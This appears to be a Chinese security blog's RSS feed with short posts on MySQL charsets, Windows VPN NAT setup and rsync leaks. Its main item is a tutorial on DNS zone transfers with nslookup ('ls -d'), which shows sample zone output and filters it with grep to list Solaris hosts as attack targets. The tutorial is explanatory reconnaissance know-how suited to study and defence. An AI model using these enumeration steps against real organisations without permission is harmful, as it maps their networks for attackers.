<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
	<channel>
		<title>冷焰's blog</title>
		<link>http://www.normb.net/</link>
		<description>只有在最远的地方,才能把曾经的那段时光,看的最清楚……</description>
		<copyright>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</copyright>
		<generator>SaBlog-X Version 1.6 Build 20080806</generator>
		<lastBuildDate>Tue, 07 Feb 2012 14:17:38 +0000</lastBuildDate>
		<ttl>30</ttl>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=46</guid>
			<title>mysql字符集的问题</title>
			<author>admin</author>
			<description><![CDATA[场景：
mysql导入数据出现这个错误Warning | 1366 | Incorrect string value:

环境：
mysql 5.5.16

原因：
字符集不一致导致，在新建表的时候语句后面加上engine=myisam default charset=gbk;即可<br /><br /><a href="http://www.normb.net/?action=show&amp;id=46" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=46</link>
			<category domain="http://www.normb.net/?cid=3">Database</category>
			<pubDate>2011-11-23 15:37</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=45</guid>
			<title>产品体验到一些想法</title>
			<author>admin</author>
			<description><![CDATA[<p>备忘，记录下</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=45" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=45</link>
			<category domain="http://www.normb.net/?cid=7">manager</category>
			<pubDate>2011-11-20 01:29</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=44</guid>
			<title>備忘 windows全版本单网卡VPN的做法</title>
			<author>admin</author>
			<description><![CDATA[<p>前面根据不同的版本的搭建方法不同，单网卡记得配置下面的步骤： <br />
下面设置nat服务: 1.在&quot;ip路由&quot;选择中右键点击&quot;常规&quot;,然后&quot;添加新的路由选择协议&quot; <br />
2.选择&quot;nat协议&quot;,然后在nat中添加新接口. --将&quot;本地连接&quot;添加上，并且将其&quot;设置为公用接口连接至internet&quot;，加上&quot;转换tcp/udp报头&quot; <br />
3.win2000单网卡中,at只有一个接口是不能工作的，另一个接口就应该加上vpn的那个接口了. 要想添加此接口，要用到命令行工具  netsh.exe <br />
运行netsh.exe后出现以下提示符 netsh &gt;  然后按顺序输入以下命令即可  set machine 你的机器名 <br />
routing <br />
ip <br />
nat add interface name=&quot;内部&quot; mode=private</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=44" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=44</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2011-11-11 05:46</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=43</guid>
			<title>rsync的信息泄露问题</title>
			<author>admin</author>
			<description><![CDATA[<p>http://bbs.linuxtone.org/thread-6632-1-1.html</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=43" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=43</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2011-10-30 20:31</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=42</guid>
			<title>DNS 查询 区域传送 nslookup</title>
			<author>admin</author>
			<description><![CDATA[<p class="a1" style="MARGIN: 6pt 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">对一名系统管理员来说，允许不受信任的因特网用户执行</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">区域传送（</span><span lang="EN-US"><font face="Times New Roman">zone transfer</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">）操作是后果最为严重的错误配置之一。</span></font></p>
<p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">区域传送操作指的是一台后备服务器使用来自主服务器的数据刷新自己的</span><span lang="EN-US"><font face="Times New Roman">zone</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">数据库。这为运行中的</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">服务提供了一定的冗余度，其目的是为了防止主域名服务器因意外故障变得不可用时影响到全局。一般来说，</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">区域传送操作只在网络里真的有后备域名</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">服务器时才有必要执行，但许多</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">服务器却被错误地配置成只要有人发出请求，就会向对方提供一个</span><span lang="EN-US"><font face="Times New Roman">zone</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">数据库的拷贝。如果所提供的信息只是与连到因特网上且具备有效主机名的系统相关，那么这种错误配置不一定是坏事，尽管这使得攻击者发现潜在目标要容易得多。真正的问题发生在一个单位没有使用公用</span><span lang="EN-US"><font face="Times New Roman">/</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">私用</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">机制来分割外部公用</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">信息和内部私用</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">信息的时候，此时内部主机名和</span><span lang="EN-US"><font face="Times New Roman">IP</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">地址都暴露给了攻击者。把内部</span><span lang="EN-US"><font face="Times New Roman">IP</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">地址信息提供给因特网上不受信任的用户，就像是把一个单位的内部网络完整蓝图或导航图奉送给了别人。</span></font></p>
<p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">下面查看几个用于进行区域传送的方法以及从中能获取的信息类型。尽管执行区域传送有多个不同的工具，我们还是只打算讨论其中几种。</span></font></p>
<p class="a0" style="MARGIN: 0cm 0cm 6pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">使用大多数</span><span lang="EN-US"><font face="Times New Roman">UNIX</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">和</span><span lang="EN-US"><font face="Times New Roman">Windows</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">上通常提供的</span><span lang="EN-US"><font face="Times New Roman">nslookup</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">客户程序是执行区域传送的一个简单办法。我们可以以交互模式使用</span><span lang="EN-US"><font face="Times New Roman">nslookup</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">：</span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">[bash]$ <strong style="mso-bidi-font-weight: normal">nslookup</strong></font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">Default Server: ns1.example.net</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">Address: 10.10.20.2</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">&gt; 216.182.1.1</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">Server: ns1.example.net</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">Address: 10.10.20.2</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">Name: gate.tellurian.net</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">Address: 216.182.1.1</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 6pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New">&nbsp;</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">&gt; <strong style="mso-bidi-font-weight: normal">set type=any</strong></font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">&gt; <strong style="mso-bidi-font-weight: normal">ls -d Tellurian.net.</strong> &gt;\&gt; <strong style="mso-bidi-font-weight: normal">/tmp/zone_out</strong></font></span></font></p>
<p><font size="2"><span style="FONT-SIZE: 10.5pt; FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-hansi-font-family: -Times New Roman-; mso-bidi-font-family: -Times New Roman-; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-langu">我们先以交互模式运行</span><span lang="EN-US" style="FONT-SIZE: 10.5pt; FONT-FAMILY: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-language: EN-US; mso-fareast-language: ZH-CN; mso-fareast-font-family: 宋体">nslookup</span><span style="FONT-SIZE: 10.5pt; FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-hansi-font-family: -Times New Roman-; mso-bidi-font-family: -Times New Roman-; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-langu">程序。在启动之后，</span><span lang="EN-US" style="FONT-SIZE: 10.5pt; FONT-FAMILY: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-language: EN-US; mso-fareast-language: ZH-CN; mso-fareast-font-family: 宋体">nslookup</span><span style="FONT-SIZE: 10.5pt; FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-hansi-font-family: -Times New Roman-; mso-bidi-font-family: -Times New Roman-; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-langu">程序将回显它当前使用的名字服务器，它通常是本单位的本地</span><span lang="EN-US" style="FONT-SIZE: 10.5pt; FONT-FAMILY: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-language: EN-US; mso-fareast-language: ZH-CN; mso-fareast-font-family: 宋体">DNS</span><span style="FONT-SIZE: 10.5pt; FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-hansi-font-family: -Times New Roman-; mso-bidi-font-family: -Times New Roman-; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-langu">服务器或者某</span><span lang="EN-US" style="FONT-SIZE: 10.5pt; FONT-FAMILY: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-language: EN-US; mso-fareast-language: ZH-CN; mso-fareast-font-family: 宋体">ISP</span><span style="FONT-SIZE: 10.5pt; FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-hansi-font-family: -Times New Roman-; mso-bidi-font-family: -Times New Roman-; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-langu">提供的</span><span lang="EN-US" style="FONT-SIZE: 10.5pt; FONT-FAMILY: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-language: EN-US; mso-fareast-language: ZH-CN; mso-fareast-font-family: 宋体">DNS</span><span style="FONT-SIZE: 10.5pt; FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-bidi-font-size: 10.0pt; mso-hansi-font-family: -Times New Roman-; mso-bidi-font-family: -Times New Roman-; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA; mso-ansi-langu">服务器。因为<span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">这个例子里的本地</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">服务器（</span><span lang="EN-US"><font face="Times New Roman">10.10.20.2</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">）本身无法对目标域里的主机名和</span><span lang="EN-US"><font face="Times New Roman">IP</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">地址做出权威的解析&mdash;&mdash;我们想要查找的</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">记录没有被全部收录在这台</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">服务器里，所以还需要以手动方式告诉</span><span lang="EN-US"><font face="Times New Roman">nslookup</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">去查询哪一个</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">服务器。具体到上面的例子，我们使用</span><span lang="EN-US"><font face="Times New Roman">Tellurian Networks</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">的主</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">服务器（</span><span lang="EN-US"><font face="Times New Roman">216.182.1.1</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">），这是在早些时候执行域名</span><span lang="EN-US"><font face="Times New Roman">whois</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">查询时找到该信息的。</span></span></font></p>
<p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">接下来，我们把记录类型设置为&ldquo;</span><span lang="EN-US"><font face="Times New Roman">any</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">&rdquo;，这允许你取得任何可能的</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">记录（使用</span><span lang="EN-US"><font face="Times New Roman">man nslookup</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">命令查看），从而构成一个完整的清单。</span></font></p>
<p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">最后，我们使用&ldquo;</span><span lang="EN-US"><font face="Times New Roman">ls</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">&rdquo;选项列出所有与目标域名有关的记录，其中&ldquo;</span><span lang="EN-US"><font face="Times New Roman">-d</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">&rdquo;开关用于列出该域名的所有记录。我们在域名后面添了一个点号&ldquo;</span><span lang="EN-US"><font face="Times New Roman">.</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">&rdquo;以强调这是一个完全限定域名，不过大多数情况下不添加也行。另外，我们把输出内容重定向到文件</span><font face="Times New Roman"> <span lang="EN-US">/tmp/zone_out</span></font><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">里去，以便稍后对它操作。</span></font></p>
<p class="a1" style="MARGIN: 0cm 0cm 6pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">完成区域传送后，查看输出文件，找一找是否存在有助于确认特定系统的让人感兴趣的信息。因为</span><span lang="EN-US"><font face="Times New Roman">Tellurian Network</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">网站不允许进行区域传送操作，我们这里只能给出一个示例性的输出结果：</span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New">[bash]$ <strong style="mso-bidi-font-weight: normal">more zone_out</strong></font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New">acct18 <span style="mso-spacerun: yes">&nbsp;&nbsp;</span>1D IN A 192.168.230.3</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-spacerun: yes">&nbsp;</span><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN HINFO &quot;Gateway2000&quot; &quot;WinWKGRPS&quot;</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN MX 0 tellurianadmin-smtp</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN RP bsmith.rci bsmith.who</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN TXT &quot;Location:Telephone Room&quot;</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New">ce <span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp; </span><span style="mso-spacerun: yes">&nbsp;&nbsp;</span>1D IN CNAME aesop</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New">au <span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp; </span><span style="mso-spacerun: yes">&nbsp;&nbsp;</span>1D IN A 192.168.230.4</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN HINFO &quot;Aspect&quot; &quot;MS-DOS&quot;</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN MX 0 andromeda</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN RP jcoy.erebus jcoy.who</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN TXT &quot;Location: Library&quot;</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New">acct21 <span style="mso-spacerun: yes">&nbsp;&nbsp;</span>1D IN A 192.168.230.5</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN HINFO &quot;Gateway2000&quot; &quot;WinWKGRPS&quot;</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN MX 0 tellurianadmin-smtp</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN RP bsmith.rci bsmith.who</font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt; LINE-HEIGHT: 11.5pt; mso-line-height-rule: exactly"><font size="2"><span lang="EN-US"><font face="Courier New"><span style="mso-tab-count: 2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>1D IN TXT &quot;Location:Accounting&quot;</font></span></font></p>
<p class="a2" style="MARGIN: 6pt 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">我们不打算详细解释每个记录，但将指出若干种重要的类型。在上面的输出清单里，列在右边的每个主机系统名栏都对应一个&ldquo;</span><span lang="EN-US"><font face="Times New Roman">A</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">&rdquo;类型记录，它指出了该系统的</span><span lang="EN-US"><font face="Times New Roman">IP</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">地址。另外，每台主机都对应一个</span><span lang="EN-US"><font face="Times New Roman">HINFO</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">记录，标识其平台或所运行的操作系统类型（参见</span><span lang="EN-US"><font face="Times New Roman">RFC-952</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">）。</span><span lang="EN-US"><font face="Times New Roman">HINFO</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">记录并非必需，反倒给攻击者提供了不少信息。既然我们已把区域传送的结果保存到一个输出文件中，接着就能很容易地利用</span><span lang="EN-US"><font face="Times New Roman">grep</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">、</span><span lang="EN-US"><font face="Times New Roman">sed</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">或</span><span lang="EN-US"><font face="Times New Roman">awk</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">等</span><span lang="EN-US"><font face="Times New Roman">UNIX</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">程序或者</span><span lang="EN-US"><font face="Times New Roman">Perl</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">语言脚本来处理这些结果。</span></font></p>
<p class="a1" style="MARGIN: 0cm 0cm 6pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">假定我们是</span><span lang="EN-US"><font face="Times New Roman">SunOS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">或</span><span lang="EN-US"><font face="Times New Roman">Solaris</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">专家，可以通过编程找出其</span><span lang="EN-US"><font face="Times New Roman">HINFO</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">记录带有</span><span lang="EN-US"><font face="Times New Roman">Sparc</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">、</span><span lang="EN-US"><font face="Times New Roman">Sun</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">或</span><span lang="EN-US"><font face="Times New Roman">Solaris</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">等词的</span><span lang="EN-US"><font face="Times New Roman">IP</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">地址。</span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">[bash]$ <strong style="mso-bidi-font-weight: normal">grep -i solaris zone_out |wc &ndash;l</strong></font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><strong style="mso-bidi-font-weight: normal"><span lang="EN-US"><font face="Courier New"><span style="mso-spacerun: yes">&nbsp;&nbsp;&nbsp; </span>388</font></span></strong></font></p>
<p class="a2" style="MARGIN: 6pt 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">可以看到，我们有</span><span lang="EN-US"><font face="Times New Roman">388</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">个引用&ldquo;</span><span lang="EN-US"><font face="Times New Roman">Solaris</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">&rdquo;一词的潜在记录。毫无疑问，我们有大量的目标。</span></font></p>
